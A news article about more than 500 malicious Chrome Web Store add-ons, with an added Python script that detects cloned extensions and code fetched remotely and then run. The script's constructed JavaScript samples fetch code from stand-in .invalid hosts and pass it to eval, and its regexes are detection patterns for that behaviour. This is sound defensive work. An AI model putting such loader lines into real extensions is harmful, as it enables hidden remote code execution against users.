More than 500 malicious add-ons removed from Chrome Web Store

Results have been summed up for the blocking of a series of malicious add-ons for the Chrome browser, which affected several million users. In the first stage, independent researcher Jamila Kaya and Duo Security identified 71 malicious add-ons in the Chrome Web Store, accounting for more than 1.7 million installations in total. After Google was informed of the problem, more than 430 similar add-ons were found in the catalog; the number of installations for these was not reported.

Notably, despite the impressive number of installs, none of the problematic add-ons had any user reviews, which raises questions about how they came to be installed and how the malicious activity went unnoticed. All problematic add-ons have now been removed from the Chrome Web Store.
According to the researchers, the malicious activity associated with the blocked add-ons had been ongoing since January 2019, although some of the domains used to carry out the malicious actions were registered as early as 2017.

For the most part, the malicious add-ons were presented as tools for promoting products and participating in advertising services (the user views ads and receives a reward). The add-ons used a redirection technique: when a page was opened, the user was sent through a chain of advertised sites before the requested site was finally displayed.

All add-ons used the same technique to hide malicious activity and bypass the Chrome Web Store's add-on verification mechanisms. The code of all add-ons was nearly identical at the source level, with the exception of the function names, which were unique to each add-on. The malicious logic was delivered from centralized control servers: the add-on first connected to a domain that matched the add-on's name (for example, Mapstrek.com), and was then redirected to one of the control servers, which returned the script to be executed next.
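The two traits described above (source code identical except for function names, plus a script fetched from a control server and executed at runtime) are exactly what a store reviewer or a defender auditing installed extensions can test for mechanically. The Python sketch below is an added example, not code from the article, from the researchers, or from the add-ons themselves: it collapses each script to a "skeleton" by replacing declared function names with positional placeholders and flattening string literals (so differing control-server hostnames do not break the match), hashes the skeleton to cluster clones, and separately flags scripts that both reach the network and pass a string to eval or new Function. The three sample scripts and the .invalid hostnames are constructed for the demonstration.

```python
import hashlib
import re

# Constructed sample background scripts, NOT code recovered from the real
# add-ons: two "clones" that differ only in function names and the hostname
# they contact, plus one unrelated, benign-looking extension.
EXT_CLONE_1 = """
function qzxPlv() { return fetch("https://mapstrek.invalid/c").then(r => r.text()); }
function wqrTm(s) { eval(s); }
qzxPlv().then(wqrTm);
"""
EXT_CLONE_2 = """
function hkLmwe() { return fetch("https://other-name.invalid/c").then(r => r.text()); }
function ptoZz(s) { eval(s); }
hkLmwe().then(ptoZz);
"""
EXT_BENIGN = """
function init() { chrome.storage.local.get("prefs", render); }
function render(p) { document.title = p.title; }
init();
"""

FUNC_DECL = re.compile(r"\bfunction\s+([A-Za-z_$][\w$]*)")
STRING_LIT = re.compile(r'"(?:[^"\\]|\\.)*"|\'(?:[^\'\\]|\\.)*\'')
REMOTE_FETCH = re.compile(r"\b(fetch|XMLHttpRequest|importScripts)\b")
DYNAMIC_EVAL = re.compile(r"\beval\s*\(|\bnew\s+Function\s*\(")


def normalize(source: str) -> str:
    """Return a 'skeleton' of the script: declared function names are replaced by
    positional placeholders (F0, F1, ...), string literals are collapsed to "S",
    and whitespace is squashed. Two scripts that differ only in identifiers and
    hostnames therefore normalize to the same text."""
    names = []
    for m in FUNC_DECL.finditer(source):
        if m.group(1) not in names:
            names.append(m.group(1))
    out = source
    for i, name in enumerate(names):
        out = re.sub(r"\b" + re.escape(name) + r"\b", f"F{i}", out)
    out = STRING_LIT.sub('"S"', out)
    return re.sub(r"\s+", " ", out).strip()


def skeleton_hash(source: str) -> str:
    """SHA-256 of the normalized skeleton; equal hashes mean 'same code modulo names'."""
    return hashlib.sha256(normalize(source).encode("utf-8")).hexdigest()


def cluster_by_skeleton(extensions: dict) -> dict:
    """Group extension ids by skeleton hash. A large cluster whose raw sources all
    differ is the pattern the researchers describe: one family, many names."""
    clusters = {}
    for ext_id, src in extensions.items():
        clusters.setdefault(skeleton_hash(src), []).append(ext_id)
    return clusters


def loads_remote_code(source: str) -> bool:
    """Flag scripts that both fetch from the network and hand a string to eval or
    new Function: the 'download the next-stage script from a control server and
    run it' behaviour that a static review of the packaged code will not see."""
    return bool(REMOTE_FETCH.search(source)) and bool(DYNAMIC_EVAL.search(source))


if __name__ == "__main__":
    sample = {"ext-a": EXT_CLONE_1, "ext-b": EXT_CLONE_2, "ext-c": EXT_BENIGN}
    for digest, ids in cluster_by_skeleton(sample).items():
        print(digest[:16], ids)
    for ext_id, src in sample.items():
        print(ext_id, "loads remote code:", loads_remote_code(src))
```

Run over a directory of unpacked extensions, the clustering step would put all members of such a family under one hash even though a byte-level hash of each package differs; the remote-code check is deliberately coarse (a regex, not a parser) and will produce false positives on legitimate extensions that use eval, so it is a triage signal rather than a verdict.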

The actions carried out through the add-ons include uploading confidential user data to an external server, forwarding users to malicious sites, and facilitating the installation of malicious applications (for example, a message is displayed claiming that the computer is infected, and malware is then offered under the guise of an antivirus or a browser update). The redirect targets included various phishing domains and sites exploiting browsers with unpatched vulnerabilities (after exploitation, for example, attempts were made to install malware that intercepts access keys and monitors confidential data passing through the clipboard).

Source: opennet.ru
